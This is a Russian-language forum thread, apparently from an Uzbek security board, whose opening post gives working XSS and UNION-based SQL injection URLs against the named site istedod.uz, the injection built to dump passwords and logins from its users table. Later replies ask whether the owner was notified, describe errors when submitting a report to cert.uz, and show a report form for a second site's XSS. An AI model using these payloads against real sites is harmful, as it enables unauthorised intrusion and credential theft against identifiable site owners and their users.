istedod.uz - XSS, SQL injection
Код:
http://istedod.uz/?page&pid=8--%27%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E Код:
http://istedod.uz/?page&pid=8%20and%201=0%20union%20select%201,parol,3,login%20from%20users%20-- |
insider, Вы сообщили сперва владельцу сайта?!
|
Цитата:
|
Цитата:
|
Цитата:
Цитата:
а если я не собираюсь сообщать Место работы,Телефоны и всякую инфу ? |
при отправке данных в
http://cert.uz/incident/ возникает ошибка Method Not Implemented POST to /incident/send.php not supported. |
Цитата:
|
Цитата:
|
Цитата:
Тема сообщения: freshmusic.uz - XSS Ваше имя: insider Место работы: ХХХ Должность: ХХХ Телефон, факс: 222-55-66 Электронная почта: aaa@aa.aa Просим вас указать ... : Код:
http://freshmusic.uz/abc.php?type= << XSS >> Возможно стоит фильтр POST данных которая реагирует на некоторые ключевые слова. |
Цитата:
|
Текущее время: 02:57. Часовой пояс GMT +5. |
Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd. Перевод:
OOO «Единый интегратор UZINFOCOM»